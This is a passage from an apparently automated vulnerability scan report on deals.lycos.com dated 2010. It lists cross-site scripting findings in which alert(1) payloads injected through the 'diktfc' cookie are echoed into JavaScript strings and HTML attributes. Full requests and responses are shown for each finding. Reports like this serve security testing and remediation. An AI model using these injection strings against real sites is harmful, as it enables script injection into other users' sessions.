User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8df10"><script>alert(1)</script>decb6417e3f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:06 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/electronics-142&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8df10"><script>alert(1)</script>decb6417e3f&amp;cj=1" alt="tracker" />
...[SNIP]...

1.272. http://deals.lycos.com/deals/category/electronics-142 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/electronics-142

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba404"%3balert(1)//a1b2a499f40 was submitted in the diktfc cookie. This input was echoed as ba404";alert(1)//a1b2a499f40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/electronics-142 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aba404"%3balert(1)//a1b2a499f40; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
pt type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/electronics-142",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aba404";alert(1)//a1b2a499f40"
});
</script>
...[SNIP]...

1.273. http://deals.lycos.com/deals/category/financial-services-439 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/financial-services-439

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d716"%3balert(1)//059f898a8b was submitted in the diktfc cookie. This input was echoed as 9d716";alert(1)//059f898a8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/financial-services-439 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d716"%3balert(1)//059f898a8b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:57 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/financial-services-439",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d716";alert(1)//059f898a8b"
});
</script>
...[SNIP]...

1.274. http://deals.lycos.com/deals/category/financial-services-439 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/financial-services-439

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d3fd"><script>alert(1)</script>7ca665b3883 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/financial-services-439 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6d3fd"><script>alert(1)</script>7ca665b3883; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/financial-services-439&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6d3fd"><script>alert(1)</script>7ca665b3883&amp;cj=1" alt="tracker" />
...[SNIP]...

1.275. http://deals.lycos.com/deals/category/food-and-drink-213 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/food-and-drink-213

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2eb80"%3balert(1)//5af42826628 was submitted in the diktfc cookie. This input was echoed as 2eb80";alert(1)//5af42826628 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/food-and-drink-213 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2eb80"%3balert(1)//5af42826628; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/food-and-drink-213",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2eb80";alert(1)//5af42826628"
});
</script>
...[SNIP]...

1.276. http://deals.lycos.com/deals/category/food-and-drink-213 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/food-and-drink-213

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86fb9"><script>alert(1)</script>f0965134d1e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/food-and-drink-213 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A86fb9"><script>alert(1)</script>f0965134d1e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/food-and-drink-213&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A86fb9"><script>alert(1)</script>f0965134d1e&amp;cj=1" alt="tracker" />
...[SNIP]...

1.277. http://deals.lycos.com/deals/category/gaming-and-toys-186 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/gaming-and-toys-186

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70f84"><script>alert(1)</script>4a6d4c1536e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/gaming-and-toys-186 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A70f84"><script>alert(1)</script>4a6d4c1536e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:26 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/gaming-and-toys-186&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A70f84"><script>alert(1)</script>4a6d4c1536e&amp;cj=1" alt="tracker" />
...[SNIP]...

1.278. http://deals.lycos.com/deals/category/gaming-and-toys-186 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/gaming-and-toys-186

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d8a5"%3balert(1)//fe2e4db2273 was submitted in the diktfc cookie. This input was echoed as 5d8a5";alert(1)//fe2e4db2273 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/gaming-and-toys-186 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d8a5"%3balert(1)//fe2e4db2273; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ype="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/gaming-and-toys-186",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d8a5";alert(1)//fe2e4db2273"
});
</script>
...[SNIP]...

1.279. http://deals.lycos.com/deals/category/gifts-flowers-and-cards-218 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/gifts-flowers-and-cards-218

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df85e"><script>alert(1)</script>a9f8ea40e17 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/gifts-flowers-and-cards-218 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adf85e"><script>alert(1)</script>a9f8ea40e17; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/gifts-flowers-and-cards-218&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adf85e"><script>alert(1)</script>a9f8ea40e17&amp;cj=1" alt="tracker" />
...[SNIP]...

1.280. http://deals.lycos.com/deals/category/gifts-flowers-and-cards-218 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/gifts-flowers-and-cards-218

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0282"%3balert(1)//7489f873325 was submitted in the diktfc cookie. This input was echoed as e0282";alert(1)//7489f873325 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/gifts-flowers-and-cards-218 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae0282"%3balert(1)//7489f873325; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/gifts-flowers-and-cards-218",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae0282";alert(1)//7489f873325"
});
</script>
...[SNIP]...

1.281. http://deals.lycos.com/deals/category/health-and-beauty-228 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/health-and-beauty-228

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57630"%3balert(1)//273c00b5a44 was submitted in the diktfc cookie. This input was echoed as 57630";alert(1)//273c00b5a44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/health-and-beauty-228 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A57630"%3balert(1)//273c00b5a44; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:39 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
e="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/health-and-beauty-228",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A57630";alert(1)//273c00b5a44"
});
</script>
...[SNIP]...

1.282. http://deals.lycos.com/deals/category/health-and-beauty-228 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/health-and-beauty-228

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ec09"><script>alert(1)</script>ef66589da7f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/health-and-beauty-228 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
